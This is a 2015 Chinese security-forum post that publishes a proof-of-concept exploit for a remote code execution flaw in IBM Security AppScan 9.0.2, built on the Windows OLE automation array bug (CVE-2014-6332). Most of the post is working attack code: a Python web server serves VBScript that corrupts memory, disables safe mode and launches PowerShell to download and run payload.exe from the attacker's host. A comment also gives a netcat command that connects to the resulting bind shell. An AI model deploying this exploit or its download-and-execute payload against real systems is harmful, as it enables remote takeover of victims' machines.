搜索
中国白客联盟»论坛 Passion irrigation 业界新闻(Industry News) IBM Security AppScan 9.0.2远程代码执行漏洞(含POC)
返回列表 发新帖
查看: 5708|回复: 0

IBM Security AppScan 9.0.2远程代码执行漏洞(含POC)

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-6-4 19:09:13 | 显示全部楼层 |阅读模式

IBM Security AppScan Standard是美国IBM公司的一套Web应用的安全测试工具。该工具可在应用开发生命周期中进行自动化动态和静态安全漏洞扫描。该漏洞基于Windows OLE自动化数组远程代码执行漏洞,远程攻击者可利用此漏洞执行任意代码。


漏洞POC

  1. #!/usr/bin/python

  3. import BaseHTTPServer, socket

  5. ##
  6. # IBM Security AppScan Standard OLE Automation Array Remote Code Execution
  7. #
  8. # Author: Naser Farhadi
  9. # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
  10. #
  11. # Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7
  12. #
  13. # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/
  14. # if you able to exploit IE then you can exploit appscan and acunetix ;)
  15. # This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And
  16. # Metasploit windows/shell_bind_tcp Executable Payload
  17. #
  18. # Usage:
  19. #       chmod +x appscan.py
  20. #       ./appscan.py
  21. #
  22. # Video: http://youtu.be/hPs1zQaBLMU       ...
  23. #       nc 172.20.10.14 333
  24. ##

  26. class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  27.     def do_GET(req):
  28.         req.send_response(200)
  29.         if req.path == "/payload.exe":
  30.             req.send_header(,Content-type,, ,application/exe,)
  31.             req.end_headers()
  32.             exe = open("payload.exe", ,rb,)
  33.             req.wfile.write(exe.read())
  34.             exe.close()
  35.         else:
  36.             req.send_header(,Content-type,, ,text/html,)
  37.             req.end_headers()
  38.             req.wfile.write("""Please scan me!
  39.                             <SCRIPT LANGUAGE="VBScript">
  40.                             function runmumaa()
  41.                             On Error Resume Next
  42.                             set shell=createobject("Shell.Application")
  43.                             command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile(,http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe,,\
  44.                             ,payload.exe,);$(New-Object -com Shell.Application).ShellExecute(,payload.exe,);"
  45.                             shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
  46.                             end function

  48.                             dim   aa()
  49.                             dim   ab()
  50.                             dim   a0
  51.                             dim   a1
  52.                             dim   a2
  53.                             dim   a3
  54.                             dim   win9x
  55.                             dim   intVersion
  56.                             dim   rnda
  57.                             dim   funclass
  58.                             dim   myarray

  60.                             Begin()

  62.                             function Begin()
  63.                               On Error Resume Next
  64.                               info=Navigator.UserAgent

  66.                               if(instr(info,"Win64")>0)   then
  67.                                  exit   function
  68.                               end if

  70.                               if (instr(info,"MSIE")>0)   then
  71.                                          intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
  72.                               else
  73.                                  exit   function  
  74.                                          
  75.                               end if

  77.                               win9x=0

  79.                               BeginInit()
  80.                               If Create()=True Then
  81.                                  myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
  82.                                  myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

  84.                                  if(intVersion<4) then
  85.                                      document.write("<br> IE")
  86.                                      document.write(intVersion)
  87.                                      runshellcode()                    
  88.                                  else  
  89.                                       setnotsafemode()
  90.                                  end if
  91.                               end if
  92.                             end function

  94.                             function BeginInit()
  95.                                Randomize()
  96.                                redim aa(5)
  97.                                redim ab(5)
  98.                                a0=13+17*rnd(6)
  99.                                a3=7+3*rnd(5)
  100.                             end function

  102.                             function Create()
  103.                               On Error Resume Next
  104.                               dim i
  105.                               Create=False
  106.                               For i = 0 To 400
  107.                                 If Over()=True Then
  108.                                 ,   document.write(i)     
  109.                                    Create=True
  110.                                    Exit For
  111.                                 End If
  112.                               Next
  113.                             end function

  115.                             sub testaa()
  116.                             end sub

  118.                             function mydata()
  119.                                 On Error Resume Next
  120.                                  i=testaa
  121.                                  i=null
  122.                                  redim  Preserve aa(a2)  
  123.                               
  124.                                  ab(0)=0
  125.                                  aa(a1)=i
  126.                                  ab(0)=6.36598737437801E-314

  128.                                  aa(a1+2)=myarray
  129.                                  ab(2)=1.74088534731324E-310  
  130.                                  mydata=aa(a1)
  131.                                  redim  Preserve aa(a0)  
  132.                             end function


  135.                             function setnotsafemode()
  136.                                 On Error Resume Next
  137.                                 i=mydata()  
  138.                                 i=readmemo(i+8)
  139.                                 i=readmemo(i+16)
  140.                                 j=readmemo(i+&h134)  
  141.                                 for k=0 to &h60 step 4
  142.                                     j=readmemo(i+&h120+k)
  143.                                     if(j=14) then
  144.                                           j=0         
  145.                                           redim  Preserve aa(a2)            
  146.                                  aa(a1+2)(i+&h11c+k)=ab(4)
  147.                                           redim  Preserve aa(a0)  

  149.                                  j=0
  150.                                           j=readmemo(i+&h120+k)   
  151.                                     
  152.                                            Exit for
  153.                                        end if

  155.                                 next
  156.                                 ab(2)=1.69759663316747E-313
  157.                                 runmumaa()
  158.                             end function

  160.                             function Over()
  161.                                 On Error Resume Next
  162.                                 dim type1,type2,type3
  163.                                 Over=False
  164.                                 a0=a0+a3
  165.                                 a1=a0+2
  166.                                 a2=a0+&h8000000
  167.                               
  168.                                 redim  Preserve aa(a0)
  169.                                 redim   ab(a0)     
  170.                               
  171.                                 redim  Preserve aa(a2)
  172.                               
  173.                                 type1=1
  174.                                 ab(0)=1.123456789012345678901234567890
  175.                                 aa(a0)=10
  176.                                       
  177.                                 If(IsObject(aa(a1-1)) = False) Then
  178.                                    if(intVersion<4) then
  179.                                        mem=cint(a0+1)*16            
  180.                                        j=vartype(aa(a1-1))
  181.                                        if((j=mem+4) or (j*8=mem+8)) then
  182.                                           if(vartype(aa(a1-1))<>0)  Then   
  183.                                              If(IsObject(aa(a1)) = False ) Then            
  184.                                                type1=VarType(aa(a1))
  185.                                              end if               
  186.                                           end if
  187.                                        else
  188.                                          redim  Preserve aa(a0)
  189.                                          exit  function

  191.                                        end if
  192.                                     else
  193.                                        if(vartype(aa(a1-1))<>0)  Then   
  194.                                           If(IsObject(aa(a1)) = False ) Then
  195.                                               type1=VarType(aa(a1))
  196.                                           end if               
  197.                                         end if
  198.                                     end if
  199.                                 end if
  200.                                           
  201.                                 
  202.                                 If(type1=&h2f66) Then         
  203.                                       Over=True      
  204.                                 End If  
  205.                                 If(type1=&hB9AD) Then
  206.                                       Over=True
  207.                                       win9x=1
  208.                                 End If  

  210.                                 redim  Preserve aa(a0)         
  211.                                     
  212.                             end function

  214.                             function ReadMemo(add)
  215.                                 On Error Resume Next
  216.                                 redim  Preserve aa(a2)  
  217.                               
  218.                                 ab(0)=0   
  219.                                 aa(a1)=add+4     
  220.                                 ab(0)=1.69759663316747E-313      
  221.                                 ReadMemo=lenb(aa(a1))  
  222.                               
  223.                                 ab(0)=0   
  224.                              
  225.                                 redim  Preserve aa(a0)
  226.                             end function

  228.                             </script>""")

  230. if __name__ == ,__main__,:
  231.     sclass = BaseHTTPServer.HTTPServer
  232.     server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
  233.     print "Http server started", socket.gethostbyname(socket.gethostname()), 80
  234.     try:
  235.         server.serve_forever()
  236.     except KeyboardInterrupt:
  237.         pass
  238.     server.server_close()
复制代码



Windows, 美国, 动态, 开发, Windows

相关帖子

过段时间可能会取消签到功能了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表